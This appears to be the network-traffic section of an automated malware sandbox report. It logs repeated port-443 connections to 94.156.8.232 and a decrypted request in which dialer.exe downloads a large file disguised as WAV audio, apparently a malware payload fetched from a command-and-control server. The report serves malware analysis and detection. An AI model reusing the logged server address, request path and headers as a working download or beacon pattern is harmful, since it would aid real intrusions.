                      May 23, 2024 20:15:16.598002911 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:16.598020077 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:16.598047018 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:16.635974884 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:16.636008024 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:16.636095047 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:16.636117935 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:16.636163950 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:16.658655882 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:16.658704996 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:16.658952951 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:16.658952951 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:16.658976078 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:16.659027100 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:16.700438976 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:16.700500965 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:16.700659037 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:16.700695038 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:16.700720072 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:16.700994968 CEST49699443192.168.2.694.156.8.232
                      May 23, 2024 20:15:16.701014996 CEST4434969994.156.8.232192.168.2.6
                      May 23, 2024 20:15:26.901273966 CEST49707443192.168.2.694.156.8.232
                      May 23, 2024 20:15:26.901366949 CEST4434970794.156.8.232192.168.2.6
                      May 23, 2024 20:15:26.901499033 CEST49707443192.168.2.694.156.8.232
                      May 23, 2024 20:15:26.901607990 CEST49707443192.168.2.694.156.8.232
                      May 23, 2024 20:15:26.901627064 CEST4434970794.156.8.232192.168.2.6
                      May 23, 2024 20:15:27.886473894 CEST4434970794.156.8.232192.168.2.6
                      May 23, 2024 20:15:27.886698008 CEST49707443192.168.2.694.156.8.232
                      May 23, 2024 20:15:27.890955925 CEST49707443192.168.2.694.156.8.232
                      May 23, 2024 20:15:27.890983105 CEST4434970794.156.8.232192.168.2.6
                      May 23, 2024 20:15:27.891257048 CEST4434970794.156.8.232192.168.2.6
                      May 23, 2024 20:15:27.891526937 CEST49707443192.168.2.694.156.8.232
                      May 23, 2024 20:15:27.934528112 CEST4434970794.156.8.232192.168.2.6
                      May 23, 2024 20:15:28.102087975 CEST4434970794.156.8.232192.168.2.6
                      May 23, 2024 20:15:28.102243900 CEST49707443192.168.2.694.156.8.232
                      May 23, 2024 20:15:28.102269888 CEST4434970794.156.8.232192.168.2.6
                      May 23, 2024 20:15:28.102319956 CEST49707443192.168.2.694.156.8.232
                      May 23, 2024 20:15:28.102322102 CEST4434970794.156.8.232192.168.2.6
                      May 23, 2024 20:15:28.102361917 CEST4434970794.156.8.232192.168.2.6
                      May 23, 2024 20:15:33.814069986 CEST49708443192.168.2.694.156.8.232
                      May 23, 2024 20:15:33.814110041 CEST4434970894.156.8.232192.168.2.6
                      May 23, 2024 20:15:33.814178944 CEST49708443192.168.2.694.156.8.232
                      May 23, 2024 20:15:33.814558983 CEST49708443192.168.2.694.156.8.232
                      May 23, 2024 20:15:33.814568043 CEST4434970894.156.8.232192.168.2.6
                      May 23, 2024 20:15:34.845655918 CEST4434970894.156.8.232192.168.2.6
                      May 23, 2024 20:15:34.845788002 CEST49708443192.168.2.694.156.8.232
                      May 23, 2024 20:15:34.852072954 CEST49708443192.168.2.694.156.8.232
                      May 23, 2024 20:15:34.852097988 CEST4434970894.156.8.232192.168.2.6
                      May 23, 2024 20:15:34.852849007 CEST4434970894.156.8.232192.168.2.6
                      May 23, 2024 20:15:34.853066921 CEST49708443192.168.2.694.156.8.232
                      May 23, 2024 20:15:34.898502111 CEST4434970894.156.8.232192.168.2.6
                      May 23, 2024 20:15:35.088617086 CEST4434970894.156.8.232192.168.2.6
                      May 23, 2024 20:15:35.088784933 CEST4434970894.156.8.232192.168.2.6
                      May 23, 2024 20:15:35.088891983 CEST49708443192.168.2.694.156.8.232
                      May 23, 2024 20:15:35.088922977 CEST49708443192.168.2.694.156.8.232
                      May 23, 2024 20:15:35.088937044 CEST4434970894.156.8.232192.168.2.6
                      May 23, 2024 20:15:40.098721981 CEST49709443192.168.2.694.156.8.232
                      May 23, 2024 20:15:40.098756075 CEST4434970994.156.8.232192.168.2.6
                      May 23, 2024 20:15:40.098844051 CEST49709443192.168.2.694.156.8.232
                      May 23, 2024 20:15:40.098931074 CEST49709443192.168.2.694.156.8.232
                      May 23, 2024 20:15:40.098937988 CEST4434970994.156.8.232192.168.2.6
                      May 23, 2024 20:15:41.133457899 CEST4434970994.156.8.232192.168.2.6
                      May 23, 2024 20:15:41.133624077 CEST49709443192.168.2.694.156.8.232
                      May 23, 2024 20:15:41.137401104 CEST49709443192.168.2.694.156.8.232
                      May 23, 2024 20:15:41.137411118 CEST4434970994.156.8.232192.168.2.6
                      May 23, 2024 20:15:41.137624025 CEST4434970994.156.8.232192.168.2.6
                      May 23, 2024 20:15:41.137732983 CEST49709443192.168.2.694.156.8.232
                      May 23, 2024 20:15:41.178494930 CEST4434970994.156.8.232192.168.2.6
                      May 23, 2024 20:15:41.377218008 CEST4434970994.156.8.232192.168.2.6
                      May 23, 2024 20:15:41.377418995 CEST49709443192.168.2.694.156.8.232
                      May 23, 2024 20:15:41.377454996 CEST4434970994.156.8.232192.168.2.6
                      May 23, 2024 20:15:41.377468109 CEST49709443192.168.2.694.156.8.232
                      May 23, 2024 20:15:41.377502918 CEST49709443192.168.2.694.156.8.232
                      May 23, 2024 20:15:46.364701986 CEST49710443192.168.2.694.156.8.232
                      May 23, 2024 20:15:46.364793062 CEST4434971094.156.8.232192.168.2.6
                      May 23, 2024 20:15:46.364905119 CEST49710443192.168.2.694.156.8.232
                      May 23, 2024 20:15:46.365027905 CEST49710443192.168.2.694.156.8.232
                      May 23, 2024 20:15:46.365050077 CEST4434971094.156.8.232192.168.2.6
                      May 23, 2024 20:15:47.322252989 CEST4434971094.156.8.232192.168.2.6
                      May 23, 2024 20:15:47.322549105 CEST49710443192.168.2.694.156.8.232
                      May 23, 2024 20:15:47.326149940 CEST49710443192.168.2.694.156.8.232
                      May 23, 2024 20:15:47.326158047 CEST4434971094.156.8.232192.168.2.6
                      May 23, 2024 20:15:47.326364040 CEST4434971094.156.8.232192.168.2.6
                      May 23, 2024 20:15:47.326466084 CEST49710443192.168.2.694.156.8.232
                      May 23, 2024 20:15:47.370491028 CEST4434971094.156.8.232192.168.2.6
                      May 23, 2024 20:15:47.536894083 CEST4434971094.156.8.232192.168.2.6
                      May 23, 2024 20:15:47.536987066 CEST4434971094.156.8.232192.168.2.6
                      May 23, 2024 20:15:47.537223101 CEST49710443192.168.2.694.156.8.232
                      May 23, 2024 20:15:47.537223101 CEST49710443192.168.2.694.156.8.232
                      May 23, 2024 20:15:47.537223101 CEST49710443192.168.2.694.156.8.232
                      May 23, 2024 20:15:47.848342896 CEST49710443192.168.2.694.156.8.232
                      May 23, 2024 20:15:47.848375082 CEST4434971094.156.8.232192.168.2.6
                      May 23, 2024 20:15:52.536211967 CEST49711443192.168.2.694.156.8.232
                      May 23, 2024 20:15:52.536253929 CEST4434971194.156.8.232192.168.2.6
                      May 23, 2024 20:15:52.536370039 CEST49711443192.168.2.694.156.8.232
                      May 23, 2024 20:15:52.536437988 CEST49711443192.168.2.694.156.8.232
                      May 23, 2024 20:15:52.536448002 CEST4434971194.156.8.232192.168.2.6
                      May 23, 2024 20:15:53.517848015 CEST4434971194.156.8.232192.168.2.6
                      May 23, 2024 20:15:53.517925978 CEST49711443192.168.2.694.156.8.232
                      May 23, 2024 20:15:53.528631926 CEST49711443192.168.2.694.156.8.232
                      May 23, 2024 20:15:53.528646946 CEST4434971194.156.8.232192.168.2.6
                      May 23, 2024 20:15:53.528898001 CEST4434971194.156.8.232192.168.2.6
                      May 23, 2024 20:15:53.529006004 CEST49711443192.168.2.694.156.8.232
                      May 23, 2024 20:15:53.574497938 CEST4434971194.156.8.232192.168.2.6
                      May 23, 2024 20:15:53.749002934 CEST4434971194.156.8.232192.168.2.6
                      May 23, 2024 20:15:53.749088049 CEST4434971194.156.8.232192.168.2.6
                      May 23, 2024 20:15:53.749170065 CEST49711443192.168.2.694.156.8.232
                      May 23, 2024 20:15:53.749485970 CEST49711443192.168.2.694.156.8.232
                      May 23, 2024 20:15:53.749485970 CEST49711443192.168.2.694.156.8.232
                      May 23, 2024 20:15:53.749505043 CEST4434971194.156.8.232192.168.2.6
                      May 23, 2024 20:15:53.749515057 CEST4434971194.156.8.232192.168.2.6
                      May 23, 2024 20:15:58.754921913 CEST49713443192.168.2.694.156.8.232
                      May 23, 2024 20:15:58.754986048 CEST4434971394.156.8.232192.168.2.6
                      May 23, 2024 20:15:58.755075932 CEST49713443192.168.2.694.156.8.232
                      May 23, 2024 20:15:58.755150080 CEST49713443192.168.2.694.156.8.232
                      May 23, 2024 20:15:58.755162954 CEST4434971394.156.8.232192.168.2.6
                      May 23, 2024 20:15:59.782171011 CEST4434971394.156.8.232192.168.2.6
                      May 23, 2024 20:15:59.782234907 CEST49713443192.168.2.694.156.8.232
                      May 23, 2024 20:15:59.786750078 CEST49713443192.168.2.694.156.8.232
                      May 23, 2024 20:15:59.786760092 CEST4434971394.156.8.232192.168.2.6
                      May 23, 2024 20:15:59.786982059 CEST4434971394.156.8.232192.168.2.6
                      May 23, 2024 20:15:59.787089109 CEST49713443192.168.2.694.156.8.232
                      May 23, 2024 20:15:59.834491014 CEST4434971394.156.8.232192.168.2.6
                      May 23, 2024 20:16:00.009871006 CEST4434971394.156.8.232192.168.2.6
                      May 23, 2024 20:16:00.009929895 CEST4434971394.156.8.232192.168.2.6
                      May 23, 2024 20:16:00.010087013 CEST49713443192.168.2.694.156.8.232
                      May 23, 2024 20:16:00.010220051 CEST49713443192.168.2.694.156.8.232
                      May 23, 2024 20:16:00.010262966 CEST4434971394.156.8.232192.168.2.6
                      May 23, 2024 20:16:00.010293961 CEST49713443192.168.2.694.156.8.232
                      May 23, 2024 20:16:00.010308981 CEST4434971394.156.8.232192.168.2.6
                      May 23, 2024 20:16:05.005059004 CEST49714443192.168.2.694.156.8.232
                      May 23, 2024 20:16:05.005100965 CEST4434971494.156.8.232192.168.2.6
                      May 23, 2024 20:16:05.005201101 CEST49714443192.168.2.694.156.8.232
                      May 23, 2024 20:16:05.005297899 CEST49714443192.168.2.694.156.8.232
                      May 23, 2024 20:16:05.005305052 CEST4434971494.156.8.232192.168.2.6
                      May 23, 2024 20:16:06.049655914 CEST4434971494.156.8.232192.168.2.6
                      May 23, 2024 20:16:06.049818993 CEST49714443192.168.2.694.156.8.232
                      May 23, 2024 20:16:06.779572010 CEST49714443192.168.2.694.156.8.232
                      May 23, 2024 20:16:06.779608965 CEST4434971494.156.8.232192.168.2.6
                      May 23, 2024 20:16:06.780510902 CEST4434971494.156.8.232192.168.2.6
                      May 23, 2024 20:16:06.780832052 CEST49714443192.168.2.694.156.8.232
                      May 23, 2024 20:16:06.822499037 CEST4434971494.156.8.232192.168.2.6
                      May 23, 2024 20:16:06.994832993 CEST4434971494.156.8.232192.168.2.6
                      May 23, 2024 20:16:06.994992018 CEST4434971494.156.8.232192.168.2.6
                      May 23, 2024 20:16:06.995052099 CEST49714443192.168.2.694.156.8.232
                      May 23, 2024 20:16:06.995163918 CEST49714443192.168.2.694.156.8.232
                      May 23, 2024 20:16:06.995178938 CEST4434971494.156.8.232192.168.2.6
                      May 23, 2024 20:16:11.989583969 CEST49715443192.168.2.694.156.8.232
                      May 23, 2024 20:16:11.989623070 CEST4434971594.156.8.232192.168.2.6
                      May 23, 2024 20:16:11.989768982 CEST49715443192.168.2.694.156.8.232
                      May 23, 2024 20:16:11.990178108 CEST49715443192.168.2.694.156.8.232
                      May 23, 2024 20:16:11.990187883 CEST4434971594.156.8.232192.168.2.6
                      May 23, 2024 20:16:13.005773067 CEST4434971594.156.8.232192.168.2.6
                      May 23, 2024 20:16:13.006063938 CEST49715443192.168.2.694.156.8.232
                      May 23, 2024 20:16:13.012059927 CEST49715443192.168.2.694.156.8.232
                      May 23, 2024 20:16:13.012084961 CEST4434971594.156.8.232192.168.2.6
                      May 23, 2024 20:16:13.012299061 CEST4434971594.156.8.232192.168.2.6
                      May 23, 2024 20:16:13.012439966 CEST49715443192.168.2.694.156.8.232
                      May 23, 2024 20:16:13.054497957 CEST4434971594.156.8.232192.168.2.6
                      May 23, 2024 20:16:13.224746943 CEST4434971594.156.8.232192.168.2.6
                      May 23, 2024 20:16:13.224817038 CEST4434971594.156.8.232192.168.2.6
                      May 23, 2024 20:16:13.225049973 CEST49715443192.168.2.694.156.8.232
                      May 23, 2024 20:16:13.225094080 CEST49715443192.168.2.694.156.8.232
                      May 23, 2024 20:16:13.225112915 CEST4434971594.156.8.232192.168.2.6
                      May 23, 2024 20:16:18.239373922 CEST49716443192.168.2.694.156.8.232
                      May 23, 2024 20:16:18.239425898 CEST4434971694.156.8.232192.168.2.6
                      May 23, 2024 20:16:18.239660025 CEST49716443192.168.2.694.156.8.232
                      May 23, 2024 20:16:18.239695072 CEST49716443192.168.2.694.156.8.232
                      May 23, 2024 20:16:18.239702940 CEST4434971694.156.8.232192.168.2.6
                      May 23, 2024 20:16:19.254206896 CEST4434971694.156.8.232192.168.2.6
                      May 23, 2024 20:16:19.254584074 CEST49716443192.168.2.694.156.8.232
                      May 23, 2024 20:16:19.260817051 CEST49716443192.168.2.694.156.8.232
                      May 23, 2024 20:16:19.260864973 CEST4434971694.156.8.232192.168.2.6
                      May 23, 2024 20:16:19.261579990 CEST4434971694.156.8.232192.168.2.6
                      May 23, 2024 20:16:19.261744976 CEST49716443192.168.2.694.156.8.232
                      May 23, 2024 20:16:19.302495956 CEST4434971694.156.8.232192.168.2.6
                      May 23, 2024 20:16:19.494199991 CEST4434971694.156.8.232192.168.2.6
                      May 23, 2024 20:16:19.494383097 CEST4434971694.156.8.232192.168.2.6
                      May 23, 2024 20:16:19.494395018 CEST49716443192.168.2.694.156.8.232
                      May 23, 2024 20:16:19.494431973 CEST4434971694.156.8.232192.168.2.6
                      May 23, 2024 20:16:19.494446039 CEST49716443192.168.2.694.156.8.232
                      May 23, 2024 20:16:19.494453907 CEST4434971694.156.8.232192.168.2.6
                      May 23, 2024 20:16:24.489432096 CEST49717443192.168.2.694.156.8.232
                      May 23, 2024 20:16:24.489479065 CEST4434971794.156.8.232192.168.2.6
                      May 23, 2024 20:16:24.489640951 CEST49717443192.168.2.694.156.8.232
                      May 23, 2024 20:16:24.489870071 CEST49717443192.168.2.694.156.8.232
                      May 23, 2024 20:16:24.489880085 CEST4434971794.156.8.232192.168.2.6
                      May 23, 2024 20:16:25.600328922 CEST4434971794.156.8.232192.168.2.6
                      May 23, 2024 20:16:25.600564957 CEST49717443192.168.2.694.156.8.232
                      May 23, 2024 20:16:25.604417086 CEST49717443192.168.2.694.156.8.232
                      May 23, 2024 20:16:25.604456902 CEST4434971794.156.8.232192.168.2.6
                      May 23, 2024 20:16:25.604697943 CEST4434971794.156.8.232192.168.2.6
                      May 23, 2024 20:16:25.604861975 CEST49717443192.168.2.694.156.8.232
                      May 23, 2024 20:16:25.646534920 CEST4434971794.156.8.232192.168.2.6
                      May 23, 2024 20:16:25.859555006 CEST4434971794.156.8.232192.168.2.6
                      May 23, 2024 20:16:25.859721899 CEST4434971794.156.8.232192.168.2.6
                      May 23, 2024 20:16:25.859858990 CEST49717443192.168.2.694.156.8.232
                      May 23, 2024 20:16:25.859859943 CEST49717443192.168.2.694.156.8.232
                      May 23, 2024 20:16:25.859859943 CEST49717443192.168.2.694.156.8.232
                      May 23, 2024 20:16:25.859947920 CEST4434971794.156.8.232192.168.2.6
                      May 23, 2024 20:16:30.848768950 CEST49718443192.168.2.694.156.8.232
                      May 23, 2024 20:16:30.848860025 CEST4434971894.156.8.232192.168.2.6
                      May 23, 2024 20:16:30.849160910 CEST49718443192.168.2.694.156.8.232
                      May 23, 2024 20:16:30.849400997 CEST49718443192.168.2.694.156.8.232
                      May 23, 2024 20:16:30.849417925 CEST4434971894.156.8.232192.168.2.6
                      May 23, 2024 20:16:31.949423075 CEST4434971894.156.8.232192.168.2.6
                      May 23, 2024 20:16:31.949933052 CEST49718443192.168.2.694.156.8.232
                      May 23, 2024 20:16:31.961632013 CEST49718443192.168.2.694.156.8.232
                      May 23, 2024 20:16:31.961678982 CEST4434971894.156.8.232192.168.2.6
                      May 23, 2024 20:16:31.962452888 CEST4434971894.156.8.232192.168.2.6
                      May 23, 2024 20:16:31.962621927 CEST49718443192.168.2.694.156.8.232
                      May 23, 2024 20:16:32.006521940 CEST4434971894.156.8.232192.168.2.6
                      May 23, 2024 20:16:32.190315962 CEST4434971894.156.8.232192.168.2.6
                      May 23, 2024 20:16:32.190574884 CEST4434971894.156.8.232192.168.2.6
                      May 23, 2024 20:16:32.190960884 CEST49718443192.168.2.694.156.8.232
                      May 23, 2024 20:16:32.191274881 CEST49718443192.168.2.694.156.8.232
                      May 23, 2024 20:16:32.191274881 CEST49718443192.168.2.694.156.8.232
                      May 23, 2024 20:16:32.191339970 CEST4434971894.156.8.232192.168.2.6
                      May 23, 2024 20:16:32.191378117 CEST4434971894.156.8.232192.168.2.6
                      May 23, 2024 20:16:37.222383976 CEST49719443192.168.2.694.156.8.232
                      May 23, 2024 20:16:37.222446918 CEST4434971994.156.8.232192.168.2.6
                      May 23, 2024 20:16:37.222526073 CEST49719443192.168.2.694.156.8.232
                      May 23, 2024 20:16:37.223058939 CEST49719443192.168.2.694.156.8.232
                      May 23, 2024 20:16:37.223073006 CEST4434971994.156.8.232192.168.2.6
                      May 23, 2024 20:16:38.256117105 CEST4434971994.156.8.232192.168.2.6
                      May 23, 2024 20:16:38.256308079 CEST49719443192.168.2.694.156.8.232
                      May 23, 2024 20:16:39.085470915 CEST49719443192.168.2.694.156.8.232
                      May 23, 2024 20:16:39.085506916 CEST4434971994.156.8.232192.168.2.6
                      May 23, 2024 20:16:39.085926056 CEST4434971994.156.8.232192.168.2.6
                      May 23, 2024 20:16:39.086070061 CEST49719443192.168.2.694.156.8.232
                      May 23, 2024 20:16:39.126493931 CEST4434971994.156.8.232192.168.2.6
                      May 23, 2024 20:16:39.315978050 CEST4434971994.156.8.232192.168.2.6
                      May 23, 2024 20:16:39.322134972 CEST49719443192.168.2.694.156.8.232
                      May 23, 2024 20:16:39.322154999 CEST4434971994.156.8.232192.168.2.6
                      May 23, 2024 20:16:39.322208881 CEST49719443192.168.2.694.156.8.232
                      May 23, 2024 20:16:44.333216906 CEST49720443192.168.2.694.156.8.232
                      May 23, 2024 20:16:44.333256960 CEST4434972094.156.8.232192.168.2.6
                      May 23, 2024 20:16:44.333370924 CEST49720443192.168.2.694.156.8.232
                      May 23, 2024 20:16:44.333515882 CEST49720443192.168.2.694.156.8.232
                      May 23, 2024 20:16:44.333525896 CEST4434972094.156.8.232192.168.2.6
                      May 23, 2024 20:16:45.361290932 CEST4434972094.156.8.232192.168.2.6
                      May 23, 2024 20:16:45.361443996 CEST49720443192.168.2.694.156.8.232
                      May 23, 2024 20:16:45.365627050 CEST49720443192.168.2.694.156.8.232
                      May 23, 2024 20:16:45.365647078 CEST4434972094.156.8.232192.168.2.6
                      May 23, 2024 20:16:45.365966082 CEST4434972094.156.8.232192.168.2.6
                      May 23, 2024 20:16:45.366084099 CEST49720443192.168.2.694.156.8.232
                      May 23, 2024 20:16:45.406507969 CEST4434972094.156.8.232192.168.2.6
                      May 23, 2024 20:16:45.580178022 CEST4434972094.156.8.232192.168.2.6
                      May 23, 2024 20:16:45.580261946 CEST4434972094.156.8.232192.168.2.6
                      May 23, 2024 20:16:45.580444098 CEST49720443192.168.2.694.156.8.232
                      May 23, 2024 20:16:45.580756903 CEST49720443192.168.2.694.156.8.232
                      May 23, 2024 20:16:45.580776930 CEST4434972094.156.8.232192.168.2.6
                      May 23, 2024 20:16:50.583117008 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:50.583163977 CEST4434972194.156.8.232192.168.2.6
                      May 23, 2024 20:16:50.583237886 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:50.583314896 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:50.583324909 CEST4434972194.156.8.232192.168.2.6
                      May 23, 2024 20:16:51.618299007 CEST4434972194.156.8.232192.168.2.6
                      May 23, 2024 20:16:51.618452072 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:51.622498989 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:51.622548103 CEST4434972194.156.8.232192.168.2.6
                      May 23, 2024 20:16:51.622802973 CEST4434972194.156.8.232192.168.2.6
                      May 23, 2024 20:16:51.623055935 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:51.666575909 CEST4434972194.156.8.232192.168.2.6
                      May 23, 2024 20:16:51.846887112 CEST4434972194.156.8.232192.168.2.6
                      May 23, 2024 20:16:51.847223997 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:51.847224951 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:51.847301960 CEST4434972194.156.8.232192.168.2.6
                      May 23, 2024 20:16:51.847383976 CEST49721443192.168.2.694.156.8.232
                      May 23, 2024 20:16:56.857218027 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:56.857331038 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:56.857444048 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:56.857598066 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:56.857620001 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:57.928145885 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:57.928277969 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:57.931924105 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:57.931952000 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:57.932714939 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:57.932836056 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:57.974575043 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:58.180495977 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:58.180639982 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:16:58.180708885 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:58.180877924 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:58.180877924 CEST49722443192.168.2.694.156.8.232
                      May 23, 2024 20:16:58.180919886 CEST4434972294.156.8.232192.168.2.6
                      May 23, 2024 20:17:03.500260115 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:03.500313044 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:03.500420094 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:03.500504971 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:03.500518084 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:04.709291935 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:04.709413052 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:04.719013929 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:04.719070911 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:04.719451904 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:04.719595909 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:04.766500950 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:04.932308912 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:04.932393074 CEST4434972394.156.8.232192.168.2.6
                      May 23, 2024 20:17:04.932579994 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:04.932826042 CEST49723443192.168.2.694.156.8.232
                      May 23, 2024 20:17:04.932843924 CEST4434972394.156.8.232192.168.2.6

                      HTTP Request Dependency Graph

                      • 94.156.8.232

                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.64969994.156.8.2324433544C:\Windows\SysWOW64\dialer.exe
                      TimestampBytes transferredDirectionData
                      2024-05-23 18:15:08 UTC561OUTGET /c1402fa62dc004/s209r0u5.lrdw9 HTTP/1.1
                      Host: 94.156.8.232
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                      Accept-Language: en-US,en;q=0.9
                      Accept-Encoding: gzip, deflate, br
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                      If-Match: "ete6WHCQjxNcNjY1jEgGnY3tc9nSpnEcXroCoa+G1jzhT02yKm+Udo9y++Tli4waAsLCo0lRivK7ZSYZE/haMgBlbi1DSA=="
                      Connection: close
                      2024-05-23 18:15:08 UTC152INHTTP/1.1 200 OK
                      Content-Length: 2328166
                      Content-Type: audio/wav
                      Server: Microsoft-IIS/8.0
                      Date: Thu, 23 May 2024 18:15:08 GMT
                      Connection: close
                      2024-05-23 18:15:08 UTC1027INData Raw: 52 49 46 46 5c 86 23 00 57 41 56 45 66 6d 74 20 10 00 00 00 01 00 02 00 44 ac 00 00 10 b1 02 00 04 00 10 00 64 61 74 61 38 86 23 00 01 00 00 00 01 00 01 00 01 00 01 00 01 00 ff ff fe ff 03 00 02 00 fc ff ff ff 05 00 00 00 fd ff 00 00 02 00 fc ff ff ff 04 00 00 00 fc ff 01 00 02 00 ff ff 01 00 02 00 01 00 fd ff 01 00 05 00 fe ff fc ff 03 00 02 00 fd ff fe ff 03 00 03 00 fe ff fe ff 01 00 03 00 03 00 fe ff ff ff ff ff 01 00 03 00 fe ff ff ff 00 00 03 00 00 00 fe ff 01 00 01 00 01 00 00 00 ff ff 00 00 03 00 00 00 ff ff 01 00 02 00 ff ff ff ff 03 00 01 00 fc ff 00 00 05 00 ff ff fe ff 01 00 01 00 00 00 01 00 00 00 fe ff ff ff 00 00 01 00 01 00 01 00 fe ff 01 00 00 00 00 00 ff ff 01 00 01 00 fe ff 00 00 02 00 ff ff fe ff 03 00 02 00 fc ff ff ff 03 00 03 00 ff
                      Data Ascii: RIFF\#WAVEfmt Ddata8#
                      2024-05-23 18:15:08 UTC2358INData Raw: 00 04 00 ff ff fd ff 00 00 05 00 00 00 fd ff ff ff 00 00 02 00 01 00 ff ff 00 00 00 00 00 00 fe ff 00 00 01 00 fe ff 01 00 03 00 00 00 fe ff 00 00 03 00 01 00 ff ff ff ff 03 00 02 00 ff ff fe ff 03 00 01 00 ff ff 00 00 00 00 fc ff 00 00 03 00 ff ff fe ff 02 00 00 00 fd ff 03 00 02 00 fe ff 01 00 00 00 01 00 00 00 01 00 fe ff 01 00 00 00 ff ff 00 00 01 00 fe ff 00 00 03 00 01 00 fe ff 00 00 00 00 ff ff 00 00 00 00 ff ff 01 00 03 00 ff ff fd ff 02 00 05 00 ff ff fc ff 01 00 05 00 01 00 fc ff ff ff 03 00 02 00 fc ff fe ff 04 00 00 00 fc ff fe ff 04 00 00 00 fc ff 01 00 03 00 ff ff fd ff 00 00 04 00 fe ff fd ff 00 00 02 00 fe ff ff ff 00 00 00 00 fe ff 02 00 01 00 fc ff fe ff 02 00 01 00 fd ff 03 00 03 00 fc ff fe ff 04 00 00 00 fa ff 01 00 05 00 ff ff ff ff
                      Data Ascii:
                      2024-05-23 18:15:08 UTC559INData Raw: 00 ff ff fe ff 01 00 01 00 00 00 01 00 01 00 ff ff ff ff 02 00 02 00 fc ff fd ff 05 00 04 00 fc ff fd ff 04 00 03 00 fc ff ff ff 05 00 03 00 fd ff ff ff 05 00 ff ff fc ff 03 00 02 00 fd ff fe ff 04 00 fe ff fd ff 01 00 02 00 00 00 00 00 fe ff fe ff 03 00 00 00 fc ff ff ff 02 00 00 00 ff ff 00 00 00 00 ff ff 00 00 00 00 01 00 01 00 ff ff 00 00 02 00 00 00 fe ff ff ff 00 00 02 00 00 00 fe ff fe ff 02 00 02 00 fe ff ff ff 03 00 01 00 fc ff 00 00 03 00 01 00 fe ff fe ff 01 00 02 00 01 00 fc ff fe ff 04 00 02 00 fd ff ff ff 03 00 03 00 ff ff fe ff 01 00 01 00 00 00 00 00 00 00 ff ff fe ff 03 00 01 00 fc ff fe ff 04 00 00 00 fd ff 00 00 02 00 00 00 01 00 00 00 fe ff fe ff 02 00 01 00 fd ff fe ff 03 00 00 00 fc ff 01 00 03 00 ff ff fe ff 00 00 00 00 fe ff 01 00
                      Data Ascii:
